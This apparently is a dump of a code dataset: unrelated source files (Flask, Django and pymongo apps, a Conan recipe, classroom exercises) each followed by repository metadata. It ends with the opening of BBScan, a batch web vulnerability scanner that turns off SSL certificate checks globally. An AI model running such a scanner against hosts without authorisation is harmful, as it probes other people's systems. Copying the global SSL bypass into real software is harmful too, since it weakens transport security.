mark=s.place_marker((568.5, 515.537, 513.769), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_2" not in marker_sets:
s=new_marker_set('Cog6_2')
marker_sets["Cog6_2"]=s
s= marker_sets["Cog6_2"]
mark=s.place_marker((583, 523.209, 536.88), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_3" not in marker_sets:
s=new_marker_set('Cog6_3')
marker_sets["Cog6_3"]=s
s= marker_sets["Cog6_3"]
mark=s.place_marker((585.611, 547.354, 551.872), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_4" not in marker_sets:
s=new_marker_set('Cog6_4')
marker_sets["Cog6_4"]=s
s= marker_sets["Cog6_4"]
mark=s.place_marker((594.179, 574.47, 549.589), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_5" not in marker_sets:
s=new_marker_set('Cog6_5')
marker_sets["Cog6_5"]=s
s= marker_sets["Cog6_5"]
mark=s.place_marker((597.716, 602.777, 551.59), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_6" not in marker_sets:
s=new_marker_set('Cog6_6')
marker_sets["Cog6_6"]=s
s= marker_sets["Cog6_6"]
mark=s.place_marker((604.637, 630.549, 549.279), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((604.448, 556.335, 588.454), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((602.71, 708.462, 505.837), (0.21, 0.49, 0.72), 18.4716)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((583.959, 515.305, 583.074), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_0" not in marker_sets:
s=new_marker_set('Cog7_0')
marker_sets["Cog7_0"]=s
s= marker_sets["Cog7_0"]
mark=s.place_marker((563.708, 518.242, 567.021), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_1" not in marker_sets:
s=new_marker_set('Cog7_1')
marker_sets["Cog7_1"]=s
s= marker_sets["Cog7_1"]
mark=s.place_marker((519.895, 526.465, 530.892), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_2" not in marker_sets:
s=new_marker_set('Cog7_2')
marker_sets["Cog7_2"]=s
s= marker_sets["Cog7_2"]
mark=s.place_marker((474.909, 532.432, 495.611), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((522.749, 493.257, 443.031), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((377.174, 569.157, 486.864), (0.7, 0.7, 0.7), 18.4716)
if "Cog8_0" not in marker_sets:
s=new_marker_set('Cog8_0')
marker_sets["Cog8_0"]=s
s= marker_sets["Cog8_0"]
mark=s.place_marker((602.54, 494.777, 533.823), (1, 0.5, 0), 17.1475)
if "Cog8_1" not in marker_sets:
s=new_marker_set('Cog8_1')
marker_sets["Cog8_1"]=s
s= marker_sets["Cog8_1"]
mark=s.place_marker((590.517, 484.027, 556.765), (1, 0.5, 0), 17.1475)
if "Cog8_2" not in marker_sets:
s=new_marker_set('Cog8_2')
marker_sets["Cog8_2"]=s
s= marker_sets["Cog8_2"]
mark=s.place_marker((567.816, 470.758, 566.383), (1, 0.5, 0), 17.1475)
if "Cog8_3" not in marker_sets:
s=new_marker_set('Cog8_3')
marker_sets["Cog8_3"]=s
s= marker_sets["Cog8_3"]
mark=s.place_marker((540.693, 475.431, 571.104), (1, 0.5, 0), 17.1475)
if "Cog8_4" not in marker_sets:
s=new_marker_set('Cog8_4')
marker_sets["Cog8_4"]=s
s= marker_sets["Cog8_4"]
mark=s.place_marker((513.709, 482.59, 571.115), (1, 0.5, 0), 17.1475)
if "Cog8_5" not in marker_sets:
s=new_marker_set('Cog8_5')
marker_sets["Cog8_5"]=s
s= marker_sets["Cog8_5"]
mark=s.place_marker((485.851, 482.21, 573.71), (1, 0.5, 0), 17.1475)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
mark=s.place_marker((553.92, 514.152, 542.599), (1, 0.6, 0.1), 18.4716)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((418.189, 449.589, 604.796), (1, 0.6, 0.1), 18.4716)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
|
[
"batxes@gmail.com"
] |
batxes@gmail.com
|
1ff1cdd22570704212154c995cd8d54a0224c549
|
adff1dcd60ff7b67c188a5dd763896ca16c3fe34
|
/try_except.py
|
2cc8587e0450eb63bd82745dfd2c4550bc8fbd7c
|
[] |
no_license
|
anirudhrathore/Learning-Python
|
ff135070d268680a91bb8735300b39b872850916
|
d8ccc8147cec75890eb69416ac823acb02378215
|
refs/heads/master
| 2022-02-20T13:10:20.718105
| 2019-08-20T06:04:04
| 2019-08-20T06:04:04
| 198,161,453
| 0
| 1
| null | 2019-08-20T06:04:05
| 2019-07-22T06:30:42
|
Python
|
UTF-8
|
Python
| false
| false
| 280
|
py
|
try:
answer = 10/0
number = int(input("Enter a number : "))
print(number)
except ZeroDivisionError:
print("Divided by zero")
# We can also print out the actual error
#except ZeroDivisionError as err:
# print(err)
except ValueError:
print("Invalid Input")
|
[
"anirudhsinghrathore@Anirudh-MacBook-Air-4.local"
] |
anirudhsinghrathore@Anirudh-MacBook-Air-4.local
|
456408b92d6d49b5897f511f64070af37e225658
|
ccb8dfb6c350c5dcfa17f8177a9673cd71bcccda
|
/linux_src/Gado_2/ComputerVision/BarcodeDetection.py
|
a9f948478e693b7d4fe57e695917adbbe6d9c70a
|
[] |
no_license
|
ProjectGado/Project-Gado
|
9c101d10b810f7c2ced4f0958906c786d2471386
|
bbb80343508cbf86b123cfac8d8bebb1dc1b06fa
|
refs/heads/master
| 2021-01-10T19:27:15.591811
| 2013-10-14T14:39:28
| 2013-10-14T14:39:28
| 5,619,500
| 0
| 1
| null | 2012-09-05T19:41:34
| 2012-08-30T19:05:29
|
Tcl
|
UTF-8
|
Python
| false
| false
| 838
|
py
|
'''
Created on Sep 11, 2010
@author: Tom Smith
'''
#!/usr/bin/python
import zbar
import Image
def findBarcodes(filename):
# create a reader
scanner = zbar.ImageScanner()
# configure the reader
scanner.parse_config('enable')
# obtain image data
pil = Image.open(filename).convert('L')
width, height = pil.size
raw = pil.tostring()
# wrap image data
image = zbar.Image(width, height, 'Y800', raw)
# scan the image for barcodes
scanner.scan(image)
# extract results
result = []
for symbol in image:
# do something useful with results
print 'decoded', symbol.type, 'symbol', '"%s"' % symbol.data
result.append(symbol.data)
# clean up
del(image)
return result
|
[
"pellica1@niksula.hut.fi"
] |
pellica1@niksula.hut.fi
|
321466f3974133197fbce2383811b64663e6a2ae
|
b632c401bf06f898a50eaf5ff3a5c5c607587795
|
/server/setup.py
|
b41864579d7903999cf33ebabf50e7b06d174687
|
[] |
no_license
|
DimitarTB/MusicBlog
|
cf83f08b134b26937e28fe6818cf6db0dff571cf
|
8d4628714fda1fe6f8de455b3373f98a260b732b
|
refs/heads/master
| 2023-05-30T06:29:07.702641
| 2021-06-15T22:56:47
| 2021-06-15T22:56:47
| 377,259,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,529
|
py
|
from flask import Flask, jsonify
from flask_sqlalchemy import SQLAlchemy
from flask_marshmallow import Marshmallow
from flask_cors import CORS
import random
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:password@localhost/Album_Blogs?charset=utf8&use_unicode=0'
# Zamena na: root so DB username, password so DB user password, localhsot so db host.
CORS(app)
db = SQLAlchemy(app)
ma = Marshmallow(app)
static_path = "/usr/share/nginx/html/albums" # Root directory na static file server
def customAbort(code, message):
return jsonify({
"code": code,
"message": message
}), code
def get_random_alphanumerical(_len = 16):
asciiCodes = []
alphanumerical = ""
asciiCodes += random.sample(range(97, 122), int(round(0.375 * _len)))
asciiCodes += random.sample(range(65, 90), int(round(0.375 * _len)))
asciiCodes += random.sample(range(48, 57), int(round(0.25 * _len)))
random.shuffle(asciiCodes)
for char in asciiCodes:
alphanumerical += chr(char)
return alphanumerical
def get_extension(_f):
ext = str(_f.filename.split(".")[len(_f.filename.split(".")) - 1])
if ext == "blob":
return "jpg"
else:
return ext
def createRoute(request, obj):
if request.method == "GET":
return obj.read(request)
if request.method == "POST":
return obj.create(request)
if request.method == "PUT":
return obj.update(request)
if request.method == "DELETE":
return obj.delete(request)
|
[
"dimitardev1@gmail.com"
] |
dimitardev1@gmail.com
|
0bd3b109ae38f8d075eec736fa753b44c0732135
|
7ef06872757e36c700d314933d420a94a1e0f77b
|
/JPMC_pythonTest/stringManipulations/revString.py
|
778dc73c05c1bae7d6f9f9edb9193293f94fc9b9
|
[] |
no_license
|
pallavipriya3009/Learning
|
7228cd0ea629be9d98d332e31d59e32f402e6b82
|
3e87da690a3f1c04b101ad269a6dc3eda6d87851
|
refs/heads/master
| 2021-01-17T16:29:53.766768
| 2016-06-16T02:40:30
| 2016-06-16T02:40:30
| 61,256,042
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 381
|
py
|
__author__ = 'pallavipriya'
"""How to reverse String in Java using Iteration"""
def reverseItrStr(istring):
changedStr = list(istring)
length = len(changedStr) -1
for itr in range(0,len(changedStr)/2):
changedStr[itr],changedStr[length-itr] = changedStr[length-itr],changedStr[itr]
return "".join(changedStr)
str = "retcarahc"
print(reverseItrStr(str))
|
[
"pallavipriya@MacBook-Air.home"
] |
pallavipriya@MacBook-Air.home
|
20c53c35308da9b78cc83025b0f4dc7d24f2ffe8
|
8d3d18d9c5d37426a9d0d1d675719285221c156d
|
/api/migrations/0003_auto_20200204_1655.py
|
62e8ccf06d53699275e487a93f5ab555de5f7b27
|
[] |
no_license
|
suryamurugan/Cia-DJ
|
ec9c7f1a7f008c3d3dd2c76b074fc5ded11cb6a8
|
07790746ab236f394b2f0f7cef9ca2c1db59f78a
|
refs/heads/master
| 2022-12-22T01:26:02.674161
| 2020-04-03T17:16:53
| 2020-04-03T17:16:53
| 208,579,092
| 1
| 1
| null | 2022-12-08T06:50:13
| 2019-09-15T10:44:52
|
CSS
|
UTF-8
|
Python
| false
| false
| 1,099
|
py
|
# Generated by Django 2.0.10 on 2020-02-04 16:55
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0002_auto_20200204_1146'),
]
operations = [
migrations.AddField(
model_name='events',
name='e_image',
field=models.ImageField(default='events/no-img.jpg', upload_to='images/events/'),
),
migrations.AlterField(
model_name='attendregister',
name='a_datetime',
field=models.DateTimeField(blank=True, default=datetime.datetime(2020, 2, 4, 16, 55, 20, 527444)),
),
migrations.AlterField(
model_name='news',
name='n_datetime',
field=models.DateTimeField(blank=True, default=datetime.datetime(2020, 2, 4, 16, 55, 20, 528338)),
),
migrations.AlterField(
model_name='project',
name='p_datetime',
field=models.DateTimeField(blank=True, default=datetime.datetime(2020, 2, 4, 16, 55, 20, 529594)),
),
]
|
[
"surya3542live@gmail.com"
] |
surya3542live@gmail.com
|
c9cb2cbafa6b4de1722b7de1fc662a5aff4ec488
|
29b439efb499953302de9344d48eee0772573a16
|
/week07/animal_keeper.py
|
e62ffb0d2d431030c11928e736b0643f2f7e302f
|
[] |
no_license
|
strongwucc/Python003-003
|
7e2ab36c8d285a0f6fb812e40a340eb2637f4719
|
3bb7fe6ffeda9e1dc2f0345e9c5ae65b8d2af7f8
|
refs/heads/master
| 2023-01-14T06:17:53.946617
| 2020-11-17T12:25:19
| 2020-11-17T12:25:19
| 287,277,535
| 0
| 0
| null | 2020-08-13T12:45:27
| 2020-08-13T12:45:27
| null |
UTF-8
|
Python
| false
| false
| 1,748
|
py
|
from abc import ABCMeta, abstractmethod
'''
动物类
'''
class Animal(metaclass=ABCMeta):
@abstractmethod
def __init__(self, category, shape, character):
self.category = category
self.shape = shape
self.character = character
@property
def is_ferocious(self):
return (self.shape == '中型' or self.shape == '大型') and self.category == '食肉' and self.character == '凶猛'
@property
def as_pets(self):
return not self.is_ferocious
'''
猫类
'''
class Cat(Animal):
# 叫声
call = ''
def __init__(self, name, category, shape, character):
self.name = name
super().__init__(category, shape, character)
'''
狗类
'''
class Dog(Animal):
# 叫声
call = ''
def __init__(self, name, category, shape, character):
self.name = name
super().__init__(category, shape, character)
'''
动物园类
'''
class Zoo(object):
animals = {}
def __init__(self, name):
self.name = name
# 添加动物
@classmethod
def add_animal(cls, animal):
if animal not in cls.animals:
cls.animals[animal] = animal
if not hasattr(cls, animal.__class__.__name__):
setattr(cls, animal.__class__.__name__, animal)
if __name__ == '__main__':
# 实例化动物园
z = Zoo('时间动物园')
# 实例化一只猫,属性包括名字、类型、体型、性格
cat1 = Cat('大花猫 1', '食肉', '小型', '温顺')
dog1 = Dog('大花狗 1', '食肉', '中型', '凶猛')
# 增加一只猫到动物园
z.add_animal(cat1)
z.add_animal(dog1)
# 动物园是否有猫这种动物
have_cat = hasattr(z, 'Cat')
print(have_cat)
|
[
"superwucc@gmail.com"
] |
superwucc@gmail.com
|
db138dcee9a919c6ee20eb78fe0386476deaff35
|
e23068a142a08b11fd7686dc09d46f5648aa3157
|
/curd.py
|
9477139dc29ed0d9c6deb71093d92f777d846841
|
[] |
no_license
|
tiru1930/Flask_mongoDB
|
b40629a9e8ee2cd0f4c08848f146075df37e33c3
|
e2f7a5d41e17a2fcb9a74dbdd582bb5d2500c51e
|
refs/heads/master
| 2021-01-10T02:35:31.586529
| 2015-12-07T19:22:08
| 2015-12-07T19:22:08
| 47,550,028
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,459
|
py
|
from pymongo import MongoClient
from bson.objectid import ObjectId
from RegDetails import UserDetails
from datetime import datetime
from flask import request
class UserRepo(object):
""" Repository implementing CRUD operations on contacts collection in MongoDB """
def __init__(self):
# initializing the MongoClient, this helps to
# access the MongoDB databases and collections
self.client = MongoClient(host='localhost', port=27017)
self.database = self.client['user_db']
def create(self,user):
create_id =None
if user is not None:
userName=user.User_Name
if self.database.users.find_one({"User_Name":userName}):
print create_id
return create_id
else:
create_id = self.database.users.insert(user.get_as_json())
print create_id
return create_id
else:
raise Exception("Nothing to save, becuase contact parameter is None")
def read(self,user_id=None):
if user_id is None:
return self.database.User.find({})
else:
return self.database.User.find({"_id":user_id})
def is_user_valid(self,user_name, password):
if self.database.users.find_one({"User_Name":user_name}) and self.database.users.find_one({"Password":password}):
time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
ip=request.remote_addr
sessionobj={'ipaddress':ip,'time':time}
self.database.users.update({"User_Name":user_name},{"$push":{"noOfSessions":sessionobj}})
return True
else:
return False
|
[
"tirub.1930@gmail.com"
] |
tirub.1930@gmail.com
|
11f23cf901edf4d7ad77a0e3ffdb1cf2ef1deef4
|
9de5c748145962520a0180521acdec063e14f789
|
/DJango-PILDORA-INFORMATICA/V24 Enviar Mail/tiendaonline/miapp/views.py
|
45da6bfb73c92f2fecc406349c678cd21dd579e5
|
[] |
no_license
|
CritianChipana/DJango-
|
fe83dd09b923be380906e74bc5d4db3940b18cfa
|
930f74570e1a5e1f6f476c51a4fe56310d7a123c
|
refs/heads/master
| 2023-05-29T03:54:26.690202
| 2021-01-14T05:10:09
| 2021-01-14T05:10:09
| 322,924,955
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,174
|
py
|
from django.shortcuts import render,HttpResponse
from miapp.models import Articulo
from django.core.mail import send_mail
from django.conf import settings
# Create your views here.
def busqueda_productos(request):
return render(request,"busqueda_productos.html")
def buscar(request):
if request.GET['prd']:
#mensaje="Articulo Buscado: %r"%request.GET["prd"]
producto=request.GET['prd']
if len(producto)>20:
mensaje="Texto muy largo"
else:
articulos=Articulo.objects.filter(nombre__icontains=producto)
return render(request,"resultafos_busqueda.html",{"articulos":articulos,"query":producto})
else:
mensaje="No has ingresado ningun valor"
return HttpResponse(mensaje)
def contacto(request):
if request.method == "POST":
subject =request.POST['asunto']
message =request.POST['mensaje']+ " " + request.POST['email']
email_from=settings.EMAIL_HOST_USER
recipiente = ["74309273@untels.edu.pe"]
send_mail(subject,message,email_from,recipiente)
return render(request,"gracias.html")
return render(request,"contacto.html")
|
[
"cristianchipanahuaman@gmail.com"
] |
cristianchipanahuaman@gmail.com
|
db73d937503653dfa13bb69aa972e63b63be75d3
|
27bd3927710db15093da35428c44dd8a970c7ed1
|
/img_viewer.py
|
347ff92d98e92a1324102984ac05174d0c875251
|
[
"CC0-1.0"
] |
permissive
|
gerikkub/SourdoughData
|
75522aeb5befcde9a7f0eaf783b4b65198286d4d
|
7462f7ad72a78ad7e9d3fef5d0fc83e709bfbacd
|
refs/heads/master
| 2020-05-04T17:39:47.121811
| 2019-04-10T03:11:40
| 2019-04-10T03:11:40
| 179,321,209
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,512
|
py
|
import cv2
import serial
import time
import os
import math
from multiprocessing import Process
class Logger():
def __init__(self, devices, log_dir):
self._f = open(os.path.join(log_dir, 'data.csv'), 'w')
self._devices = devices
def write_header(self):
self._f.write('timestamp,' + ','.join(self._devices) + '\n')
def write_data(self, temps):
curr_ts = time.time()
self._f.write(str(curr_ts))
for dev in self._devices:
self._f.write(',' + str(temps[dev]))
self._f.write('\n')
self._f.flush()
def read_until_str(ser, string):
data = bytes()
while data[-1*len(string):] != string.encode('utf-8'):
data = data + ser.read(1)
return data
def captureTemps(log_dir, serialDev):
ser = serial.Serial(serialDev, 115200)
ser.reset_input_buffer()
data = read_until_str(ser, 'DONE\r\n')
data = read_until_str(ser, 'DONE\r\n')
try:
data_str = data.decode('utf-8')
except:
print("Error decoding data")
return
devices = []
lines = data_str.split('\r\n')
for line in lines:
if ':' in line:
device, temp = line.split(': ')
devices.append(device)
log = Logger(devices, log_dir)
log.write_header()
while True:
data = read_until_str(ser, 'DONE\r\n')
try:
data_str = data.decode('utf-8')
except:
print("Error decoding data")
continue
curr_time = time.time()
print('Got temp data at {}', curr_time)
temps = {}
lines = data_str.split('\r\n')
for line in lines:
if ':' in line:
device, temp = line.split(': ')
temps[device] = temp
log.write_data(temps)
def captureImages(log_dir):
cap = cv2.VideoCapture(0)
img_num = 0
while True:
ret, frame = cap.read()
img_time = math.floor(time.time())
img_name = "{}_{}_img.jpg".format(img_num, img_time)
print('Captured ' + img_name)
cv2.imwrite(img_name, frame)
cv2.imshow('frame', frame)
if cv2.waitKey(1000 * 60 * 5) & 0xFF == ord('q'):
break
img_num += 1
cap.release()
cv2.destroyAllWindows()
temp_p = Process(target=captureTemps, args=('.', '/dev/cu.usbmodem0007783385771'))
img_p = Process(target=captureImages, args=('.'))
temp_p.start()
img_p.start()
while True:
time.sleep(1)
|
[
"gerikkub@gmail.com"
] |
gerikkub@gmail.com
|
8504038e141f6ee36e1d70e74e8637a770e864b6
|
6ddb95963154a9b95643a23f5f3ba54ea1877e3f
|
/Backend/services/usuario_services.py
|
a5be44a24677b35e1c0a8b9f58f616b948b7d240
|
[] |
no_license
|
AlexandreMarq/api_python
|
91e1662344c0c9472f88ee441a0b02e6ecc653af
|
80e0b36da6715f3d845fb6e102177acc9d243ad7
|
refs/heads/main
| 2023-01-23T23:42:45.758514
| 2020-11-30T17:11:15
| 2020-11-30T17:11:15
| 317,292,450
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 610
|
py
|
# Imports de modolus internos da aplicação
from infra.usuario.usuario_dao import \
listar as dao_listar, \
consultar as dao_consultar, \
cadastrar as dao_cadastrar
from model.usuario import Usuario
# Função que lista os usuarios
def listar():
return [usuario for usuario in dao_listar()]
# Função que localiza o usuario por login
def localizar(login):
usuario = dao_consultar(login)
if usuario is None:
return None
return usuario
# Função que cria Usuario
def criar(usuario_dados):
usuario = Usuario.criar(usuario_dados)
return dao_cadastrar(usuario)
|
[
"53923396+AlexandreMarq@users.noreply.github.com"
] |
53923396+AlexandreMarq@users.noreply.github.com
|
24ec00f30374320942847b2dffb91acc2fa187e5
|
8b409dfa2f1dd4bba458d269046be3cdcf0e3b90
|
/ClassifierModel.py
|
8a7c07b56e5359151c5afa1d32be542f68b521fa
|
[] |
no_license
|
basasia/StockPredictionUsingSentimentAndTechnicalAnalysis
|
c79d68beeea2863f887e069f4198cf1672426fdc
|
81d6a538e9facddf93a6574123c4739afd47185b
|
refs/heads/main
| 2023-05-11T17:29:14.590540
| 2021-06-07T16:44:49
| 2021-06-07T16:44:49
| 374,324,011
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,059
|
py
|
"""
* Author: Asia Benyadilok
* Created: 30/03/2021
* Revised: 09/05/2021
* Description: Classifier Models
* User advice: None
"""
#libraries
import numpy as np
import pandas as pd
import pickle
import joblib
from DataCollectingModule import * #import all function from Data Collecting Module
from SentimentAnalysisModule import * #import all function from Sentiment Analysis Module
from TechnicalAnalysisModule import * #import all function from Technical Analysis Module
"""
* Function: preProData
* Description: method for pre-processing data for the classifier models
* Parameters: newsHeadlines and hisPrices
* Returns: features - features for the classifier models
* Warnings: none
"""
def preProData(newsHeadlines,hisPrices):
#convert news headlines and historical prices to dataframe
hisPrices = pd.DataFrame(hisPrices)
newsHeadlines = pd.DataFrame(newsHeadlines)
#convert date on the newsheadline to date object
newsHeadlines['Date'] = pd.to_datetime(newsHeadlines['Date'])
# merge news dataframe and financial dataframe together
mergeData = newsHeadlines.merge(hisPrices, how='inner', on='Date', left_index=True)
# reset index
mergeData = mergeData.reset_index(drop=True)
# remove unwanted columns
del mergeData['headline']
#extract features
features = mergeData[['Close', 'sent', 'pos', 'neg', 'neu', 'RSI', 'MACD', 'K_percent', 'R_percent', 'Price_Rate_Change','On_Balance_Volume']]
return features
"""
* Function: predict
* Description: method for predicting the stock trend
* Parameters: features
* Returns: pred - prediction output
* Warnings: none
"""
def predict(features):
# load trained model from local machine
# edit this file path to where you saved the model
with open('C:/svm_trained_model', 'rb') as f:
svm_model = pickle.load(f)
#use the trained model to predict
pred = svm_model.predict(features)
#return prediction
return pred[0]
|
[
"noreply@github.com"
] |
basasia.noreply@github.com
|
2a42c303775f8fed8237c96d5a6047f7a3fa8003
|
922996be272d4d027cb097fea8f7515061d950dd
|
/expat/all/conanfile.py
|
d0d3139b4134af5d664812b8720f99c3c3791061
|
[
"MIT"
] |
permissive
|
efokschaner/conan-recipes
|
51ba5a380e72a891490d8439c12e83054052d334
|
c4f8b94e4017e06d602fe9d4360d44c6ec92e019
|
refs/heads/main
| 2023-07-10T19:13:48.704112
| 2021-08-05T17:34:48
| 2021-08-05T17:34:48
| 399,401,746
| 0
| 0
|
MIT
| 2021-08-24T09:07:29
| 2021-08-24T09:07:29
| null |
UTF-8
|
Python
| false
| false
| 4,119
|
py
|
from conans import ConanFile, CMake, tools, AutoToolsBuildEnvironment
import os
class ExpatConan(ConanFile):
name = "expat"
description = "Fast streaming XML parser written in C."
topics = ("conan", "expat", "xml", "parsing")
url = "https://github.com/conan-io/conan-center-index"
homepage = "https://github.com/libexpat/libexpat"
license = "MIT"
settings = "os", "compiler", "build_type", "arch"
options = {"shared": [True, False], "fPIC": [True, False]}
default_options = {"shared": False, "fPIC": True}
generators = "cmake", "pkg_config"
exports_sources = ["CMakeLists.txt", "patches/*"]
_source_subfolder = "source_subfolder"
_build_subfolder = "build_subfolder"
_cmake = None
_autotools = None
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def configure(self):
if self.options.shared:
del self.options.fPIC
del self.settings.compiler.libcxx
del self.settings.compiler.cppstd
def source(self):
tools.get(**self.conan_data["sources"][self.version])
extracted_dir = self.name + "-" + self.version
os.rename(extracted_dir, self._source_subfolder)
def _configure_cmake(self):
if self._cmake:
return self._cmake
self._cmake = CMake(self)
if tools.Version(self.version) < "2.2.8":
self._cmake.definitions["BUILD_doc"] = "Off"
self._cmake.definitions["BUILD_examples"] = "Off"
self._cmake.definitions["BUILD_shared"] = self.options.shared
self._cmake.definitions["BUILD_tests"] = "Off"
self._cmake.definitions["BUILD_tools"] = "Off"
else:
# These options were renamed in 2.2.8 to be more consistent
self._cmake.definitions["EXPAT_BUILD_DOCS"] = "Off"
self._cmake.definitions["EXPAT_BUILD_EXAMPLES"] = "Off"
self._cmake.definitions["EXPAT_SHARED_LIBS"] = self.options.shared
self._cmake.definitions["EXPAT_BUILD_TESTS"] = "Off"
self._cmake.definitions["EXPAT_BUILD_TOOLS"] = "Off"
self._cmake.configure(build_folder=self._build_subfolder)
return self._cmake
def _build_cmake(self):
cmake = self._configure_cmake()
cmake.build()
def _install_cmake(self):
cmake = self._configure_cmake()
cmake.install()
def _configure_autotools(self):
if self._autotools:
return self._autotools
if self.options.shared:
args = ["--disable-static", "--enable-shared"]
else:
args = ["--disable-shared", "--enable-static"]
self._autotools = AutoToolsBuildEnvironment(self)
self._autotools.configure(args=args, configure_dir=self._source_subfolder)
return self._autotools
def _build_autotools(self):
autotools = self._configure_autotools()
autotools.make()
def _install_autotools(self):
autotools = self._configure_autotools()
autotools.install()
def build(self):
for patch in self.conan_data.get("patches", {}).get(self.version, []):
tools.patch(**patch)
if self.settings.os == "Windows":
self._build_cmake()
else:
self._build_autotools()
def package(self):
self.copy(pattern="COPYING", dst="licenses", src=self._source_subfolder)
if self.settings.os == "Windows":
self._install_cmake()
else:
self._install_autotools()
tools.rmdir(os.path.join(self.package_folder, "lib", "pkgconfig"))
tools.rmdir(os.path.join(self.package_folder, "lib", "cmake"))
tools.rmdir(os.path.join(self.package_folder, "share"))
def package_info(self):
self.cpp_info.names["cmake_find_package"] = "EXPAT"
self.cpp_info.names["cmake_find_package_multi"] = "expat"
self.cpp_info.libs = tools.collect_libs(self)
if not self.options.shared:
self.cpp_info.defines = ["XML_STATIC"]
|
[
"dmitry@crsib.me"
] |
dmitry@crsib.me
|
4d7493b7b097c133108c60e65a5db639ef9b8581
|
0a7acf4b3f1991bccec2b8d005c7138778e2b99d
|
/lib/BBScan/BBScan.py
|
af11352491d4f165cfc04ec91fb9fb9edf7fef9b
|
[
"Apache-2.0"
] |
permissive
|
webvul/SubDomainsResultDeal
|
eeafb2a133e04471155c171290161ab283ca94a1
|
0303d95bd96b8f1e696c6534f686f30809763970
|
refs/heads/master
| 2020-04-07T08:13:42.885352
| 2017-09-07T14:21:03
| 2017-09-07T14:21:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 26,267
|
py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# A tiny Batch weB vulnerability Scanner
# my[at]lijiejie.com http://www.lijiejie.com
import urlparse
import requests
import logging
import re
import threading
import Queue
from bs4 import BeautifulSoup
import multiprocessing
import time
from string import Template
import glob
import ipaddress
import os
import webbrowser
import socket
import sys
import ssl
import codecs
import traceback
from dns.resolver import Resolver
from lib.common import get_time, parse_url, decode_response_text
from lib.cmdline import parse_args
from lib.report import template
# SSL error ignored
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
socket.setdefaulttimeout(None)
class InfoDisScanner(object):
def __init__(self, timeout=600, args=None):
self.START_TIME = time.time()
self.TIME_OUT = timeout
self.args = args
self.LINKS_LIMIT = 100 # max number of Folders to scan
self.full_scan = args.full_scan
self._init_rules()
self.url_queue = Queue.Queue() # all urls to scan
self.urls_processed = set() # processed urls
self.urls_enqueued = set() # entered queue urls
self.lock = threading.Lock()
# reset scanner
def init_reset(self):
self.START_TIME = time.time()
self.url_queue.queue.clear()
self.urls_processed = set()
self.urls_enqueued = set()
self.results = {}
self.log_file = None
self._404_status = -1
# scan from a given URL
def init_from_url(self, url):
self.init_reset()
if not url.find('://') > 0:
self.url = 'http://' + url
else:
self.url = url
self.schema, self.host, self.path = parse_url(url)
self.init_final()
def init_from_log_file(self, log_file):
self.init_reset()
self.log_file = log_file
self.schema, self.host, self.path = self._parse_url_from_file()
self.load_all_urls_from_file()
self.init_final()
#
def init_final(self):
if not self.is_port_open():
return
self.base_url = '%s://%s' % (self.schema, self.host)
self.max_depth = self._cal_depth(self.path)[1] + 5
self.session = requests.session()
if self.args.no_check404:
self._404_status = 404
self.has_404 = True
else:
self.check_404() # check existence of HTTP 404
if not self.has_404:
print '[%s] [Warning] %s has no HTTP 404.' % (get_time(), self.host)
_path, _depth = self._cal_depth(self.path)
self._enqueue('/')
self._enqueue(_path)
if not self.args.no_crawl and not self.log_file:
self.crawl_index(_path)
def is_port_open(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(4.0)
default_port = 443 if self.schema.lower() == 'https' else 80
host, port = self.host.split(':') if self.host.find(':') > 0 else (self.host, default_port)
if s.connect_ex((host, int(port))) == 0:
print '[%s] Scan %s' % (get_time(), self.host)
return True
else:
print '[%s] Fail to connect to %s' % (get_time(), self.host)
return False
s.close()
except Exception, e:
return False
finally:
s.close()
#
def _parse_url_from_file(self):
url = ''
with open(self.log_file) as infile:
for line in infile.xreadlines():
line = line.strip()
if line and len(line.split()) >= 2:
url = line.split()[1]
break
return parse_url(url)
